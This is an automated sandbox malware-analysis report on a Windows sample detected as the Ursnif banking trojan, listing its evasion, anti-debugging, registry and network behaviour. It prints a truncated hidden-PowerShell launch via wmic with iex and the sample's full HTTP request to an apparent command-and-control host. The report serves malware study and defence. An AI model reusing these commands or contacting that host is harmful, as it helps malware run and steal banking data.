Loading ...

Play interactive tourEdit tour

Analysis Report zbetcheckin_tracker_propan.exe

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:48850
Start date:03.10.2018
Start time:11:14:04
Joe Sandbox Product:Cloud
Overall analysis duration:0h 3m 39s
Hypervisor based Inspection enabled:true
Report type:full
Sample file name:zbetcheckin_tracker_propan.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 x64 HVM (Office 2010, IE11, FF 50.1, Chrome 54.0, Java 1.8.0_111, Adobe Reader DC 2015.02)
Number of analysed new started processes analysed:6
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.bank.evad.winEXE@4/6@1/2
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 49.9% (good quality ratio 45.9%)
  • Quality average: 79.1%
  • Quality standard deviation: 31.4%
HCA Information:
  • Successful, ratio: 99%
  • Number of executed functions: 82
  • Number of non-executed functions: 77
Cookbook Comments:
  • Adjust boot time
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
  • Report size getting too big, too many NtDeviceIoControlFile calls found.

Detection

StrategyScoreRangeReportingDetection
Threshold800 - 100Report FP / FNmalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: zbetcheckin_tracker_propan.exevirustotal: Detection: 44%Perma Link
Antivirus detection for unpacked fileShow sources
Source: 1.2.zbetcheckin_tracker_propan.exe.2a0000.1.unpackAvira: Label: TR/Patched.Ren.Gen
Source: 1.2.zbetcheckin_tracker_propan.exe.280000.0.unpackAvira: Label: TR/Patched.Ren.Gen

Networking:

barindex
Creates a COM Internet Explorer objectShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_CLASSES\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAsJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgidJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\ProgIDJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER_Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandlerJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCOM instance created: 0002DF01-0000-0000-C000-000000000046Jump to behavior
Downloads filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FF8G8DG0Jump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQV3tEr4y9/hOi HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: doc.rendes.atConnection: Keep-Alive
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: doc.rendes.at

E-Banking Fraud:

barindex
Detected Ursnif banking trojanShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00401C7A1_2_00401C7A

System Summary:

barindex
Contains functionality to create processes via WMIShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.1_2_002D42BD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.1_2_002D42BD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.1_2_002D42BD
Source: zbetcheckin_tracker_propan.exeBinary or memory string: %systemroot%\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::ASCII.
Starts Internet Explorer in hidden modeShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeWindow hidden: window name: IEFrameJump to behavior
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeMemory allocated: 76BA0000 page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeMemory allocated: 76AA0000 page execute and read and writeJump to behavior
Contains functionality to call native functionsShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004022EC memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,1_2_004022EC
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004018F0 NtMapViewOfSection,RtlNtStatusToDosError,1_2_004018F0
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004012F6 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,1_2_004012F6
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004027FD GetModuleHandleA,GetCursorPos,GetModuleHandleA,GetModuleHandleA,NtGetContextThread,NtGetContextThread,1_2_004027FD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040192F NtCreateSection,memset,RtlNtStatusToDosError,ZwClose,1_2_0040192F
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040143E memcpy,memcpy,memcpy,NtUnmapViewOfSection,RtlNtStatusToDosError,CloseHandle,memset,1_2_0040143E
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00402749 NtGetContextThread,RtlNtStatusToDosError,1_2_00402749
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040276A NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_0040276A
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040318D NtQueryVirtualMemory,1_2_0040318D
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00402F20 NtGetContextThread,1_2_00402F20
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004027AD NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,1_2_004027AD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D4615 NtOpenProcess,NtOpenProcessToken,memcpy,NtClose,NtClose,1_2_002D4615
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002DE040 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,NtProtectVirtualMemory,1_2_002DE040
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002DE297 NtMapViewOfSection,RtlNtStatusToDosError,1_2_002DE297
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002DE2D6 NtCreateSection,RtlNtStatusToDosError,NtClose,1_2_002DE2D6
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00401800 NtMapViewOfSection,1_1_00401800
Detected potential crypto functionShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00402F6C1_2_00402F6C
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D92AC1_2_002D92AC
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D2BC61_2_002D2BC6
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004144491_2_00414449
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004160BE1_2_004160BE
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00413F071_2_00413F07
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040E71E1_2_0040E71E
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0041498B1_2_0041498B
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_004144491_1_00414449
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00404A601_1_00404A60
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040D4F01_1_0040D4F0
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_004160BE1_1_004160BE
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00413F071_1_00413F07
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040E71E1_1_0040E71E
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0041498B1_1_0041498B
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_004151B91_1_004151B9
Found potential URLs in runtime VBA stringsShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://api.bing.com/qsml.aspx?query={searchTerms}&maxwidth={ie:maxWidth}&rowheight={ie:rowHeight}&sectionHeight={ie:sectionHeight}&FORM=IE11SS&market={language}Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeVBA Memory String: http://doc.rendes.at/wpapi/XlhPkWURsPeX9n/KdgCvOhJyTpK7WR6Gbx1E/EGIHNIQTXREQOMps/rPc05MTJOZBIhXE/5m9k63AYGwTnA9kVzH/_2BvJ_2Bu/qT25s_2Bd32_2FwmnoO7/VJJFaK5GX9ndvILO9eE/_2BmLslnLM1_2Bzpzpe8w6/7wEfNRxzT1pne/O97RG4NY/OoJbmGnwE2owDOmHjuVKPJu/as3X3i37Pg/GbArsAQJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://www.bing.com/favicon.icoJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://www.bing.com/search?q={searchTerms}&FORM=IE8SRCJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE11SRJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeVBA Memory String: http://www.bing.com/search?q={searchTerms}&src=IE-TopResult&FORM=IE11TRJump to behavior
PE file contains strange resourcesShow sources
Source: zbetcheckin_tracker_propan.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: zbetcheckin_tracker_propan.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Classification labelShow sources
Source: classification engineClassification label: mal80.bank.evad.winEXE@4/6@1/2
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D5457 CoCreateInstance,1_2_002D5457
Creates files inside the user directoryShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{F5B32550-C6EC-11E8-A1F8-44AC2DAE138A}.datJump to behavior
Creates temporary filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile created: C:\Users\user~1\AppData\Local\Temp\~DFB2457FAD379B77E9.TMPJump to behavior
PE file has an executable .text section and no other executable sectionShow sources
Source: zbetcheckin_tracker_propan.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads ini filesShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by AntivirusShow sources
Source: zbetcheckin_tracker_propan.exevirustotal: Detection: 44%
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe 'C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe'
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2296 CREDAT:275457 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2296 CREDAT:275457 /prefetch:2Jump to behavior
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior

Data Obfuscation:

barindex
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00412282 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_1_00412282
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00402F5B push ecx; ret 1_2_00402F6B
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00407210 push ebp; ret 1_2_00407222
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D929B push ecx; ret 1_2_002D92AB
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040D4D1 push ecx; ret 1_1_0040D4E4

Hooking and other Techniques for Hiding and Protection:

barindex
Writes registry values via WMIShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeWMI Registry write: IWbemServices::ExecMethod - StdRegProv::SetStringValue
Disables application error messsages (SetErrorMode)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking locale)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeEvasive API call chain: GetLocaleInfo, StrStr, ExitProcessgraph_1-7457
Tries to detect sandboxes / dynamic malware analysis system (cursor check)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004010ED1_2_004010ED
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe TID: 1376Thread sleep count: 117 > 30Jump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe TID: 1376Thread sleep time: -7020000s >= -60000sJump to behavior
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exe TID: 2096Thread sleep time: -60000s >= -60000sJump to behavior
Sample execution stops while process was sleeping (likely an evasion)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeLast function: Thread delayed
Program exit pointsShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeAPI call chain: ExitProcess graph end nodegraph_1-7347

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeSystem information queried: KernelDebuggerInformationJump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_004012F6 LdrLoadDll,LdrGetProcedureAddress,NtProtectVirtualMemory,GetModuleHandleA,memcpy,1_2_004012F6
Contains functionality to check if a debugger is running (IsDebuggerPresent)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040FE9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040FE9A
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00412282 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_1_00412282
Contains functionality to read the PEBShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0025052B mov ebx, dword ptr fs:[00000030h]1_2_0025052B
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00250000 mov eax, dword ptr fs:[00000030h]1_2_00250000
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00250000 mov ebx, dword ptr fs:[00000030h]1_2_00250000
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002506F5 mov eax, dword ptr fs:[00000030h]1_2_002506F5
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002506F5 mov ecx, dword ptr fs:[00000030h]1_2_002506F5
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00250AFD mov eax, dword ptr fs:[00000030h]1_2_00250AFD
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00290000 mov eax, dword ptr fs:[00000030h]1_2_00290000
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00290000 mov ecx, dword ptr fs:[00000030h]1_2_00290000
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00290408 mov eax, dword ptr fs:[00000030h]1_2_00290408
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040C832 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetCommandLineA,1_1_0040C832
Contains functionality to register its own exception handlerShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_0040FE9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_0040FE9A
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00413BEE SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,1_2_00413BEE
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040CA26 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_1_0040CA26
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_0040FE9A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_1_0040FE9A
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_1_00413BEE SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,1_1_00413BEE

HIPS / PFW / Operating System Protection Evasion:

barindex
May try to detect the Windows Explorer process (often used for injection)Show sources
Source: zbetcheckin_tracker_propan.exe, 00000001.00000002.3011712104.0000000000880000.00000002.sdmpBinary or memory string: Program Manager
Source: zbetcheckin_tracker_propan.exe, 00000001.00000002.3011712104.0000000000880000.00000002.sdmpBinary or memory string: Shell_TrayWnd
Source: zbetcheckin_tracker_propan.exe, 00000001.00000002.3011712104.0000000000880000.00000002.sdmpBinary or memory string: !Progman

Language, Device and Operating System Detection:

barindex
Contains functionality locales information (e.g. system language)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,1_2_0040270C
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: GetLocaleInfoA,1_2_004134B0
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: GetLocaleInfoA,GetModuleHandleA,GetModuleHandleA,1_1_004026F0
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: GetLocaleInfoA,1_1_004134B0
Contains functionality to query CPU information (cpuid)Show sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D46DF cpuid 1_2_002D46DF
Contains functionality to query local / system timeShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D1C3C GetSystemTimeAsFileTime,HeapFree,1_2_002D1C3C
Contains functionality to query the account / user nameShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_002D46DF GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,1_2_002D46DF
Contains functionality to query windows versionShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeCode function: 1_2_00401B9B CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,1_2_00401B9B
Queries the cryptographic machine GUIDShow sources
Source: C:\Users\user\Desktop\zbetcheckin_tracker_propan.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
behaviorgraph top1 signatures2 2 Behavior Graph ID: 48850 Sample: zbetcheckin_tracker_propan.exe Startdate: 03/10/2018 Architecture: WINDOWS Score: 80 19 Multi AV Scanner detection for submitted file 2->19 21 Contains functionality to create processes via WMI 2->21 6 zbetcheckin_tracker_propan.exe 2->6         started        9 iexplore.exe 4 36 2->9         started        process3 dnsIp4 23 Detected Ursnif banking trojan 6->23 25 Contains functionality to create processes via WMI 6->25 27 Found evasive API chain (may stop execution after checking locale) 6->27 31 3 other signatures 6->31 15 192.168.2.255 unknown unknown 9->15 29 Starts Internet Explorer in hidden mode 9->29 12 iexplore.exe 9 9->12         started        signatures5 process6 dnsIp7 17 doc.rendes.at 47.254.153.156, 49233, 49234, 80 CNNIC-ALIBABA-CN-NET-APAlibabaChinaTechnologyCoLtd United States 12->17

Simulations

Behavior and APIs

TimeTypeDescription
11:16:06API Interceptor149x Sleep call for process: zbetcheckin_tracker_propan.exe modified

Antivirus Detection

Initial Sample

SourceDetectionScannerLabelLink
zbetcheckin_tracker_propan.exe44%virustotalBrowse
zbetcheckin_tracker_propan.exe11%metadefenderBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

SourceDetectionScannerLabelLink
1.2.zbetcheckin_tracker_propan.exe.2a0000.1.unpack100%AviraTR/Patched.Ren.Gen
1.2.zbetcheckin_tracker_propan.exe.280000.0.unpack100%AviraTR/Patched.Ren.Gen

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

No yara matches

Unpacked PEs

No yara matches

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Startup

  • System is w7x64_hvm
  • iexplore.exe (PID: 2296 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 446332D1A5576870E436B13AEB27CA8E)
    • iexplore.exe (PID: 2776 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2296 CREDAT:275457 /prefetch:2 MD5: F2831268EC600225F611DC02166EACF0)
  • cleanup

Created / dropped Files

C:\Users\user~1\AppData\Local\Temp\~DF3B5F1BE92103196B.TMP
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:FoxPro FPT, blocks size 258, next free block index 16711424
Size (bytes):25657
Entropy (8bit):2.176978949251122
Encrypted:false
MD5:55485BE3EF18BA5AD6355F9FBE25F3CC
SHA1:ABFF4536A8CA1C8C3066997982F831EF6C581715
SHA-256:983908AB258F0BA6C99BAF97CF34434D7704BB32E8824690C998A681E9EB2D78
SHA-512:9A9DBE0C22478908E5A6E1D230BF577625A6CC99D0F3CDC6135488D5CD8287C0910331BAC430AA30A1C2A62BE47D7B28396EE3F137AC0CC46214826342927BDC
Malicious:false
Reputation:low
C:\Users\user~1\AppData\Local\Temp\~DFB2457FAD379B77E9.TMP
Process:C:\Program Files\Internet Explorer\iexplore.exe
File Type:FoxPro FPT, blocks size 258, next free block index 16711424
Size (bytes):12917
Entropy (8bit):1.26396999706028
Encrypted:false
MD5:8A18599411937FBE9F25B7F5365779FE
